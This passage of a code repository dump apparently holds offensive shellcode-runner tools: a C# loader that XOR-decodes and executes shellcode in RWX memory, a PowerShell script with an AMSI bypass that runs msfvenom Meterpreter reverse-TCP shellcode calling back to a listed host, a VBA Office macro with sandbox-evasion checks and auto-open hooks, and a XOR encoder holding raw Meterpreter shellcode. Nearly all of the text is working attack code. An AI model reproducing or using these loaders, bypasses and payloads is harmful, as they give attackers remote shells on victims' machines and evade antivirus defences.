                0xab, 0xac, 0xb2, 0xcb, 0x28, 0x9f, 0xb2, 0x71, 0xa8, 0x9a, 0xb2, 0x71, 0xa8, 0xe2, 0xb2,
                0x71, 0xa8, 0xda, 0xb7, 0xcb, 0x33, 0xb2, 0x71, 0x88, 0xaa, 0xb2, 0xf5, 0x4d, 0xb0, 0xb0,
                0xb2, 0xcb, 0x3a, 0x56, 0xc6, 0x9b, 0x86, 0xf8, 0xd6, 0xda, 0xbb, 0x3b, 0x33, 0xf7, 0xbb,
                0xfb, 0x3b, 0x18, 0x17, 0xa8, 0xbb, 0xab, 0xb2, 0x71, 0xa8, 0xda, 0x71, 0xb8, 0xc6, 0xb2,
                0xfb, 0x2a, 0x9c, 0x7b, 0x82, 0xe2, 0xf1, 0xf8, 0xf5, 0x7f, 0x88, 0xfa, 0xfa, 0xfa, 0x71,
                0x7a, 0x72, 0xfa, 0xfa, 0xfa, 0xb2, 0x7f, 0x3a, 0x8e, 0x9d, 0xb2, 0xfb, 0x2a, 0x71, 0xb2,
                0xe2, 0xaa, 0xbe, 0x71, 0xba, 0xda, 0xb3, 0xfb, 0x2a, 0x19, 0xac, 0xb7, 0xcb, 0x33, 0xb2,
                0x05, 0x33, 0xbb, 0x71, 0xce, 0x72, 0xb2, 0xfb, 0x2c, 0xb2, 0xcb, 0x3a, 0xbb, 0x3b, 0x33,
                0xf7, 0x56, 0xbb, 0xfb, 0x3b, 0xc2, 0x1a, 0x8f, 0x0b, 0xb6, 0xf9, 0xb6, 0xde, 0xf2, 0xbf,
                0xc3, 0x2b, 0x8f, 0x22, 0xa2, 0xbe, 0x71, 0xba, 0xde, 0xb3, 0xfb, 0x2a, 0x9c, 0xbb, 0x71,
                0xf6, 0xb2, 0xbe, 0x71, 0xba, 0xe6, 0xb3, 0xfb, 0x2a, 0xbb, 0x71, 0xfe, 0x72, 0xbb, 0xa2,
                0xbb, 0xa2, 0xa4, 0xa3, 0xb2, 0xfb, 0x2a, 0xa0, 0xbb, 0xa2, 0xbb, 0xa3, 0xbb, 0xa0, 0xb2,
                0x79, 0x16, 0xda, 0xbb, 0xa8, 0x05, 0x1a, 0xa2, 0xbb, 0xa3, 0xa0, 0xb2, 0x71, 0xe8, 0x13,
                0xb1, 0x05, 0x05, 0x05, 0xa7, 0xb3, 0x44, 0x8d, 0x89, 0xc8, 0xa5, 0xc9, 0xc8, 0xfa, 0xfa,
                0xbb, 0xac, 0xb3, 0x73, 0x1c, 0xb2, 0x7b, 0x16, 0x5a, 0xfb, 0xfa, 0xfa, 0xb3, 0x73, 0x1f,
                0xb3, 0x46, 0xf8, 0xfa, 0xfb, 0x41, 0x3a, 0x52, 0x12, 0x7f, 0xbb, 0xae, 0xb3, 0x73, 0x1e,
                0xb6, 0x73, 0x0b, 0xbb, 0x40, 0xb6, 0x8d, 0xdc, 0xfd, 0x05, 0x2f, 0xb6, 0x73, 0x10, 0x92,
                0xfb, 0xfb, 0xfa, 0xfa, 0xa3, 0xbb, 0x40, 0xd3, 0x7a, 0x91, 0xfa, 0x05, 0x2f, 0x90, 0xf0,
                0xbb, 0xa4, 0xaa, 0xaa, 0xb7, 0xcb, 0x33, 0xb7, 0xcb, 0x3a, 0xb2, 0x05, 0x3a, 0xb2, 0x73,
                0x38, 0xb2, 0x05, 0x3a, 0xb2, 0x73, 0x3b, 0xbb, 0x40, 0x10, 0xf5, 0x25, 0x1a, 0x05, 0x2f,
                0xb2, 0x73, 0x3d, 0x90, 0xea, 0xbb, 0xa2, 0xb6, 0x73, 0x18, 0xb2, 0x73, 0x03, 0xbb, 0x40,
                0x63, 0x5f, 0x8e, 0x9b, 0x05, 0x2f, 0x7f, 0x3a, 0x8e, 0xf0, 0xb3, 0x05, 0x34, 0x8f, 0x1f,
                0x12, 0x69, 0xfa, 0xfa, 0xfa, 0xb2, 0x79, 0x16, 0xea, 0xb2, 0x73, 0x18, 0xb7, 0xcb, 0x33,
                0x90, 0xfe, 0xbb, 0xa2, 0xb2, 0x73, 0x03, 0xbb, 0x40, 0xf8, 0x23, 0x32, 0xa5, 0x05, 0x2f,
                0x79, 0x02, 0xfa, 0x84, 0xaf, 0xb2, 0x79, 0x3e, 0xda, 0xa4, 0x73, 0x0c, 0x90, 0xba, 0xbb,
                0xa3, 0x92, 0xfa, 0xea, 0xfa, 0xfa, 0xbb, 0xa2, 0xb2, 0x73, 0x08, 0xb2, 0xcb, 0x33, 0xbb,
                0x40, 0xa2, 0x5e, 0xa9, 0x1f, 0x05, 0x2f, 0xb2, 0x73, 0x39, 0xb3, 0x73, 0x3d, 0xb7, 0xcb,
                0x33, 0xb3, 0x73, 0x0a, 0xb2, 0x73, 0x20, 0xb2, 0x73, 0x03, 0xbb, 0x40, 0xf8, 0x23, 0x32,
                0xa5, 0x05, 0x2f, 0x79, 0x02, 0xfa, 0x87, 0xd2, 0xa2, 0xbb, 0xad, 0xa3, 0x92, 0xfa, 0xba,
                0xfa, 0xfa, 0xbb, 0xa2, 0x90, 0xfa, 0xa0, 0xbb, 0x40, 0xf1, 0xd5, 0xf5, 0xca, 0x05, 0x2f,
                0xad, 0xa3, 0xbb, 0x40, 0x8f, 0x94, 0xb7, 0x9b, 0x05, 0x2f, 0xb3, 0x05, 0x34, 0x13, 0xc6,
                0x05, 0x05, 0x05, 0xb2, 0xfb, 0x39, 0xb2, 0xd3, 0x3c, 0xb2, 0x7f, 0x0c, 0x8f, 0x4e, 0xbb,
                0x05, 0x1d, 0xa2, 0x90, 0xfa, 0xa3, 0x41, 0x1a, 0xe7, 0xd0, 0xf0, 0xbb, 0x73, 0x20, 0x05,
                0x2f
            };
            int payloadSize = buf.Length;

            // Allocate RWX memory in the current process, decode the payload in place and copy it there
            IntPtr payAddr = VirtualAlloc(IntPtr.Zero, payloadSize, COMMIT_RESERVE, EXECUTEREADWRITE);
            for (int i = 0; i < buf.Length; i++)
            {
                buf[i] = (byte)((uint)buf[i] ^ 0xfa);
            }
            Marshal.Copy(buf, 0, payAddr, payloadSize);

            // Run the payload on a new thread and wait on it (INFINITE = -1) so the process does not exit first
            IntPtr hThread = CreateThread(IntPtr.Zero, 0, payAddr, IntPtr.Zero, 0, IntPtr.Zero);
            int waitResult = WaitForSingleObject(hThread, -1);
        }
    }
}
-------------------------------------------------------------------------------- /Simple Shellcode Runner/Properties/AssemblyInfo.cs: --------------------------------------------------------------------------------
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;

// General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information 7 | // associated with an assembly. 8 | [assembly: AssemblyTitle("Simple Shellcode Runner")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("Simple Shellcode Runner")] 13 | [assembly: AssemblyCopyright("Copyright © 2021")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // Setting ComVisible to false makes the types in this assembly not visible 18 | // to COM components. If you need to access a type in this assembly from 19 | // COM, set the ComVisible attribute to true on that type. 20 | [assembly: ComVisible(false)] 21 | 22 | // The following GUID is for the ID of the typelib if this project is exposed to COM 23 | [assembly: Guid("1659e645-27b0-4ab9-a10e-64ba4b801cb0")] 24 | 25 | // Version information for an assembly consists of the following four values: 26 | // 27 | // Major Version 28 | // Minor Version 29 | // Build Number 30 | // Revision 31 | // 32 | // You can specify all the values or you can default the Build and Revision Numbers 33 | // by using the '*' as shown below: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /Simple Shellcode Runner/Simple Shellcode Runner.csproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {1659E645-27B0-4AB9-A10E-64BA4B801CB0} 8 | Exe 9 | Simple_Shellcode_Runner 10 | Simple Shellcode Runner 11 | v4.7.2 12 | 512 13 | true 14 | true 15 | 16 | 17 | AnyCPU 18 | true 19 | full 20 | false 21 | bin\Debug\ 22 | DEBUG;TRACE 23 | prompt 24 | 4 25 | true 26 | 27 | 28 | AnyCPU 29 | pdbonly 30 | true 31 | bin\Release\ 32 | TRACE 33 | prompt 34 | 4 35 | true 36 | 37 | 
38 | true 39 | bin\x64\Debug\ 40 | DEBUG;TRACE 41 | true 42 | full 43 | x64 44 | 7.3 45 | prompt 46 | true 47 | 48 | 49 | bin\x64\Release\ 50 | TRACE 51 | true 52 | true 53 | pdbonly 54 | x64 55 | 7.3 56 | prompt 57 | true 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | -------------------------------------------------------------------------------- /Simple Shellcode Runner/Simple Shellcode Runner.ps1: -------------------------------------------------------------------------------- 1 | # Compact AMSI bypass 2 | [Ref].Assembly.GetType('System.Management.Automation.Amsi'+[char]85+'tils').GetField('ams'+[char]105+'InitFailed','NonPublic,Static').SetValue($null,$true) 3 | 4 | # Shellcode loader >:] 5 | function LookupFunc { 6 | Param ($moduleName, $functionName) 7 | $assem = ([AppDomain]::CurrentDomain.GetAssemblies() | 8 | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1]. 9 | Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods') 10 | $tmp=@() 11 | $assem.GetMethods() | ForEach-Object {If($_.Name -eq "GetProcAddress") {$tmp+=$_}} 12 | return $tmp[0].Invoke($null, @(($assem.GetMethod('GetModuleHandle')).Invoke($null, 13 | @($moduleName)), $functionName)) 14 | } 15 | 16 | function getDelegateType { 17 | Param ( 18 | [Parameter(Position = 0, Mandatory = $True)] [Type[]] $func, 19 | [Parameter(Position = 1)] [Type] $delType = [Void] 20 | ) 21 | $type = [AppDomain]::CurrentDomain. 22 | DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), 23 | [System.Reflection.Emit.AssemblyBuilderAccess]::Run). 24 | DefineDynamicModule('InMemoryModule', $false). 25 | DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', 26 | [System.MulticastDelegate]) 27 | $type. 28 | DefineConstructor('RTSpecialName, HideBySig, Public', 29 | [System.Reflection.CallingConventions]::Standard, $func). 30 | SetImplementationFlags('Runtime, Managed') 31 | $type. 
32 | DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $delType, $func). 33 | SetImplementationFlags('Runtime, Managed') 34 | return $type.CreateType() 35 | } 36 | 37 | # Allocate executable memory 38 | $lpMem = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll VirtualAlloc), 39 | (getDelegateType @([IntPtr], [UInt32], [UInt32], [UInt32])([IntPtr]))).Invoke([IntPtr]::Zero, 0x1000, 0x3000, 0x40) 40 | 41 | # Copy shellcode to allocated memory 42 | # msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.49.67 LPORT=443 EXITFUNC=thread -f powershell 43 | [Byte[]] $buf = 0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xcc,0x0,0x0,0x0,0x41,0x51,0x41,0x50,0x52,0x51,0x48,0x31,0xd2,0x56,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x4d,0x31,0xc9,0x48,0xf,0xb7,0x4a,0x4a,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x2,0x2c,0x20,0x41,0xc1,0xc9,0xd,0x41,0x1,0xc1,0xe2,0xed,0x52,0x48,0x8b,0x52,0x20,0x41,0x51,0x8b,0x42,0x3c,0x48,0x1,0xd0,0x66,0x81,0x78,0x18,0xb,0x2,0xf,0x85,0x72,0x0,0x0,0x0,0x8b,0x80,0x88,0x0,0x0,0x0,0x48,0x85,0xc0,0x74,0x67,0x48,0x1,0xd0,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x1,0xd0,0x50,0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x1,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0x41,0xc1,0xc9,0xd,0xac,0x41,0x1,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x3,0x4c,0x24,0x8,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x1,0xd0,0x66,0x41,0x8b,0xc,0x48,0x44,0x8b,0x40,0x1c,0x49,0x1,0xd0,0x41,0x8b,0x4,0x88,0x41,0x58,0x41,0x58,0x5e,0x48,0x1,0xd0,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,0x4b,0xff,0xff,0xff,0x5d,0x49,0xbe,0x77,0x73,0x32,0x5f,0x33,0x32,0x0,0x0,0x41,0x56,0x49,0x89,0xe6,0x48,0x81,0xec,0xa0,0x1,0x0,0x0,0x49,0x89,0xe5,0x49,0xbc,0x2,0x0,0x1,0xbb,0xc0,0xa8,0x31,0x43,0x41,0x54,0x49,0x89,0xe4,0x4c,0x89,0xf1,0x41,0xba,0x4c,0x77,0x26,0x7,0xff,0xd5,0x4c,0x89,0xea,0x68,0x1,0x1,0x0,0x0,0x59,0x41,0xba,0x29,0x80,0x6b,0x
0,0xff,0xd5,0x6a,0xa,0x41,0x5e,0x50,0x50,0x4d,0x31,0xc9,0x4d,0x31,0xc0,0x48,0xff,0xc0,0x48,0x89,0xc2,0x48,0xff,0xc0,0x48,0x89,0xc1,0x41,0xba,0xea,0xf,0xdf,0xe0,0xff,0xd5,0x48,0x89,0xc7,0x6a,0x10,0x41,0x58,0x4c,0x89,0xe2,0x48,0x89,0xf9,0x41,0xba,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0xa,0x49,0xff,0xce,0x75,0xe5,0xe8,0x93,0x0,0x0,0x0,0x48,0x83,0xec,0x10,0x48,0x89,0xe2,0x4d,0x31,0xc9,0x6a,0x4,0x41,0x58,0x48,0x89,0xf9,0x41,0xba,0x2,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x0,0x7e,0x55,0x48,0x83,0xc4,0x20,0x5e,0x89,0xf6,0x6a,0x40,0x41,0x59,0x68,0x0,0x10,0x0,0x0,0x41,0x58,0x48,0x89,0xf2,0x48,0x31,0xc9,0x41,0xba,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x48,0x89,0xc3,0x49,0x89,0xc7,0x4d,0x31,0xc9,0x49,0x89,0xf0,0x48,0x89,0xda,0x48,0x89,0xf9,0x41,0xba,0x2,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x0,0x7d,0x28,0x58,0x41,0x57,0x59,0x68,0x0,0x40,0x0,0x0,0x41,0x58,0x6a,0x0,0x5a,0x41,0xba,0xb,0x2f,0xf,0x30,0xff,0xd5,0x57,0x59,0x41,0xba,0x75,0x6e,0x4d,0x61,0xff,0xd5,0x49,0xff,0xce,0xe9,0x3c,0xff,0xff,0xff,0x48,0x1,0xc3,0x48,0x29,0xc6,0x48,0x85,0xf6,0x75,0xb4,0x41,0xff,0xe7,0x58,0x6a,0x0,0x59,0xbb,0xe0,0x1d,0x2a,0xa,0x41,0x89,0xda,0xff,0xd5 44 | [System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $lpMem, $buf.length) 45 | 46 | # Execute shellcode and wait for it to exit 47 | $hThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll CreateThread), 48 | (getDelegateType @([IntPtr], [UInt32], [IntPtr], [IntPtr],[UInt32], [IntPtr])([IntPtr]))).Invoke([IntPtr]::Zero,0,$lpMem,[IntPtr]::Zero,0,[IntPtr]::Zero) 49 | [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll WaitForSingleObject), 50 | (getDelegateType @([IntPtr], [Int32])([Int]))).Invoke($hThread, 0xFFFFFFFF) -------------------------------------------------------------------------------- /Simple Shellcode Runner/Simple Shellcode Runner.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual 
Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.30804.86 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Simple Shellcode Runner", "Simple Shellcode Runner.csproj", "{1659E645-27B0-4AB9-A10E-64BA4B801CB0}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Any CPU = Debug|Any CPU 11 | Release|Any CPU = Release|Any CPU 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {1659E645-27B0-4AB9-A10E-64BA4B801CB0}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 15 | {1659E645-27B0-4AB9-A10E-64BA4B801CB0}.Debug|Any CPU.Build.0 = Debug|Any CPU 16 | {1659E645-27B0-4AB9-A10E-64BA4B801CB0}.Release|Any CPU.ActiveCfg = Release|x64 17 | {1659E645-27B0-4AB9-A10E-64BA4B801CB0}.Release|Any CPU.Build.0 = Release|x64 18 | EndGlobalSection 19 | GlobalSection(SolutionProperties) = preSolution 20 | HideSolutionNode = FALSE 21 | EndGlobalSection 22 | GlobalSection(ExtensibilityGlobals) = postSolution 23 | SolutionGuid = {AD661BF8-44C4-4DF0-8EF0-6B38C519DD39} 24 | EndGlobalSection 25 | EndGlobal 26 | -------------------------------------------------------------------------------- /Simple Shellcode Runner/Simple Shellcode Runner.vba: -------------------------------------------------------------------------------- 1 | Private Declare PtrSafe Function Sleep Lib "kernel32" (ByVal mili As Long) As Long 2 | Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal lpThreadAttributes As Long, ByVal dwStackSize As Long, ByVal lpStartAddress As LongPtr, lpParameter As Long, ByVal dwCreationFlags As Long, lpThreadId As Long) As LongPtr 3 | Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal lpAddress As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr 4 | Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal destAddr As 
LongPtr, ByRef sourceAddr As Any, ByVal length As Long) As LongPtr 5 | Private Declare PtrSafe Function FlsAlloc Lib "KERNEL32" (ByVal callback As LongPtr) As LongPtr 6 | Sub LegitMacro() 7 | Dim allocRes As LongPtr 8 | Dim t1 As Date 9 | Dim t2 As Date 10 | Dim time As Long 11 | Dim buf As Variant 12 | Dim addr As LongPtr 13 | Dim counter As Long 14 | Dim data As Long 15 | Dim res As LongPtr 16 | 17 | ' Call FlsAlloc and verify if the result exists 18 | allocRes = FlsAlloc(0) 19 | If IsNull(allocRes) Then 20 | End 21 | End If 22 | 23 | ' Sleep for 10 seconds and verify time passed 24 | t1 = Now() 25 | Sleep (10000) 26 | t2 = Now() 27 | time = DateDiff("s", t1, t2) 28 | If time < 10 Then 29 | Exit Sub 30 | End If 31 | 32 | ' Shellcode encoded with XOR with key 0xfa/250 (output from C# helper tool) 33 | buf = Array(6, 178, 121, 30, 10, 18, 54, 250, 250, 250, 187, 171, 187, 170, 168, 178, 203, 40, 159, 178, 113, 168, 154, 171, 178, 113, 168, 226, 178, 113, 168, 218, 172, 178, 245, 77, 176, 176, 178, 113, 136, 170, 183, 203, 51, 178, 203, 58, 86, 198, 155, _ 34 | 134, 248, 214, 218, 187, 59, 51, 247, 187, 251, 59, 24, 23, 168, 178, 113, 168, 218, 187, 171, 113, 184, 198, 178, 251, 42, 156, 123, 130, 226, 241, 248, 245, 127, 136, 250, 250, 250, 113, 122, 114, 250, 250, 250, 178, 127, 58, 142, 157, 178, _ 35 | 251, 42, 190, 113, 186, 218, 179, 251, 42, 170, 113, 178, 226, 25, 172, 183, 203, 51, 178, 5, 51, 187, 113, 206, 114, 178, 251, 44, 178, 203, 58, 187, 59, 51, 247, 86, 187, 251, 59, 194, 26, 143, 11, 182, 249, 182, 222, 242, 191, 195, _ 36 | 43, 143, 34, 162, 190, 113, 186, 222, 179, 251, 42, 156, 187, 113, 246, 178, 190, 113, 186, 230, 179, 251, 42, 187, 113, 254, 114, 178, 251, 42, 187, 162, 187, 162, 164, 163, 160, 187, 162, 187, 163, 187, 160, 178, 121, 22, 218, 187, 168, 5, _ 37 | 26, 162, 187, 163, 160, 178, 113, 232, 19, 177, 5, 5, 5, 167, 179, 68, 141, 137, 200, 165, 201, 200, 250, 250, 187, 172, 179, 115, 28, 178, 123, 22, 90, 251, 250, 250, 179, 115, 31, 
179, 70, 248, 250, 251, 65, 58, 82, 203, 185, 187, _ 38 | 174, 179, 115, 30, 182, 115, 11, 187, 64, 182, 141, 220, 253, 5, 47, 182, 115, 16, 146, 251, 251, 250, 250, 163, 187, 64, 211, 122, 145, 250, 5, 47, 144, 240, 187, 164, 170, 170, 183, 203, 51, 183, 203, 58, 178, 5, 58, 178, 115, 56, _ 39 | 178, 5, 58, 178, 115, 59, 187, 64, 16, 245, 37, 26, 5, 47, 178, 115, 61, 144, 234, 187, 162, 182, 115, 24, 178, 115, 3, 187, 64, 99, 95, 142, 155, 5, 47, 127, 58, 142, 240, 179, 5, 52, 143, 31, 18, 105, 250, 250, 250, 178, _ 40 | 121, 22, 234, 178, 115, 24, 183, 203, 51, 144, 254, 187, 162, 178, 115, 3, 187, 64, 248, 35, 50, 165, 5, 47, 121, 2, 250, 132, 175, 178, 121, 62, 218, 164, 115, 12, 144, 186, 187, 163, 146, 250, 234, 250, 250, 187, 162, 178, 115, 8, _ 41 | 178, 203, 51, 187, 64, 162, 94, 169, 31, 5, 47, 178, 115, 57, 179, 115, 61, 183, 203, 51, 179, 115, 10, 178, 115, 32, 178, 115, 3, 187, 64, 248, 35, 50, 165, 5, 47, 121, 2, 250, 135, 210, 162, 187, 173, 163, 146, 250, 186, 250, _ 42 | 250, 187, 162, 144, 250, 160, 187, 64, 241, 213, 245, 202, 5, 47, 173, 163, 187, 64, 143, 148, 183, 155, 5, 47, 179, 5, 52, 19, 198, 5, 5, 5, 178, 251, 57, 178, 211, 60, 178, 127, 12, 143, 78, 187, 5, 29, 162, 144, 250, 163, _ 43 | 65, 26, 231, 208, 240, 187, 115, 32, 5, 47) 44 | 45 | ' Allocate memory space 46 | addr = VirtualAlloc(0, UBound(buf), &H3000, &H40) 47 | 48 | ' Decode the shellcode 49 | For i = 0 To UBound(buf) 50 | buf(i) = buf(i) Xor 250 51 | Next i 52 | 53 | ' Move the shellcode 54 | For counter = LBound(buf) To UBound(buf) 55 | data = buf(counter) 56 | res = RtlMoveMemory(addr + counter, data, 1) 57 | Next counter 58 | 59 | ' Execute the shellcode 60 | res = CreateThread(0, 0, addr, 0, 0, 0) 61 | End Sub 62 | Sub Document_Open() 63 | MyMacro 64 | End Sub 65 | Sub AutoOpen() 66 | MyMacro 67 | End Sub 68 | -------------------------------------------------------------------------------- /XOR Shellcode Encoder/App.config: 
-------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /XOR Shellcode Encoder/Program.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | using System.Text; 5 | using System.Threading.Tasks; 6 | 7 | namespace XorCoder 8 | { 9 | public class Program 10 | { 11 | public static void Main(string[] args) 12 | { 13 | // msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.232.133 LPORT=443 EXITFUNC=thread -f csharp 14 | byte[] buf = new byte[511] { 15 | 0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xcc,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52, 16 | 0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48, 17 | 0x8b,0x52,0x20,0x4d,0x31,0xc9,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a, 18 | 0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41, 19 | 0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48, 20 | 0x01,0xd0,0x66,0x81,0x78,0x18,0x0b,0x02,0x0f,0x85,0x72,0x00,0x00,0x00,0x8b, 21 | 0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,0xd0,0x8b,0x48, 22 | 0x18,0x50,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x4d,0x31,0xc9,0x48, 23 | 0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x48,0x31,0xc0,0x41,0xc1,0xc9, 24 | 0x0d,0xac,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45, 25 | 0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x41,0x8b, 26 | 0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,0x88,0x41,0x58, 27 | 0x41,0x58,0x5e,0x59,0x48,0x01,0xd0,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48, 28 | 0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9, 29 | 0x4b,0xff,0xff,0xff,0x5d,0x49,0xbe,0x77,0x73,0x32,0x5f,0x33,0x32,0x00,0x00, 30 | 0x41,0x56,0x49,0x89,0xe6,0x48,0x81,0xec,0xa0,0x01,0x00,0x00,0x49,0x89,0xe5, 
31 | 0x49,0xbc,0x02,0x00,0x01,0xbb,0xc0,0xa8,0xe8,0x85,0x41,0x54,0x49,0x89,0xe4, 32 | 0x4c,0x89,0xf1,0x41,0xba,0x4c,0x77,0x26,0x07,0xff,0xd5,0x4c,0x89,0xea,0x68, 33 | 0x01,0x01,0x00,0x00,0x59,0x41,0xba,0x29,0x80,0x6b,0x00,0xff,0xd5,0x6a,0x0a, 34 | 0x41,0x5e,0x50,0x50,0x4d,0x31,0xc9,0x4d,0x31,0xc0,0x48,0xff,0xc0,0x48,0x89, 35 | 0xc2,0x48,0xff,0xc0,0x48,0x89,0xc1,0x41,0xba,0xea,0x0f,0xdf,0xe0,0xff,0xd5, 36 | 0x48,0x89,0xc7,0x6a,0x10,0x41,0x58,0x4c,0x89,0xe2,0x48,0x89,0xf9,0x41,0xba, 37 | 0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0a,0x49,0xff,0xce,0x75,0xe5, 38 | 0xe8,0x93,0x00,0x00,0x00,0x48,0x83,0xec,0x10,0x48,0x89,0xe2,0x4d,0x31,0xc9, 39 | 0x6a,0x04,0x41,0x58,0x48,0x89,0xf9,0x41,0xba,0x02,0xd9,0xc8,0x5f,0xff,0xd5, 40 | 0x83,0xf8,0x00,0x7e,0x55,0x48,0x83,0xc4,0x20,0x5e,0x89,0xf6,0x6a,0x40,0x41, 41 | 0x59,0x68,0x00,0x10,0x00,0x00,0x41,0x58,0x48,0x89,0xf2,0x48,0x31,0xc9,0x41, 42 | 0xba,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x48,0x89,0xc3,0x49,0x89,0xc7,0x4d,0x31, 43 | 0xc9,0x49,0x89,0xf0,0x48,0x89,0xda,0x48,0x89,0xf9,0x41,0xba,0x02,0xd9,0xc8, 44 | 0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7d,0x28,0x58,0x41,0x57,0x59,0x68,0x00,0x40, 45 | 0x00,0x00,0x41,0x58,0x6a,0x00,0x5a,0x41,0xba,0x0b,0x2f,0x0f,0x30,0xff,0xd5, 46 | 0x57,0x59,0x41,0xba,0x75,0x6e,0x4d,0x61,0xff,0xd5,0x49,0xff,0xce,0xe9,0x3c, 47 | 0xff,0xff,0xff,0x48,0x01,0xc3,0x48,0x29,0xc6,0x48,0x85,0xf6,0x75,0xb4,0x41, 48 | 0xff,0xe7,0x58,0x6a,0x00,0x59,0xbb,0xe0,0x1d,0x2a,0x0a,0x41,0x89,0xda,0xff, 49 | 0xd5 }; 50 | 51 | // Encode the payload with XOR (fixed key) 52 | byte[] encoded = new byte[buf.Length]; 53 | for (int i = 0; i < buf.Length; i++) 54 | { 55 | encoded[i] = (byte)((uint)buf[i] ^ 0xfa); 56 | } 57 | 58 | StringBuilder hex = new StringBuilder(encoded.Length * 2); 59 | int totalCount = encoded.Length; 60 | for (int count = 0; count < totalCount; count++) 61 | { 62 | byte b = encoded[count]; 63 | 64 | if ((count + 1) == totalCount) // Dont append comma for last item 65 | { 66 | hex.AppendFormat("0x{0:x2}", b); 67 | } 68 
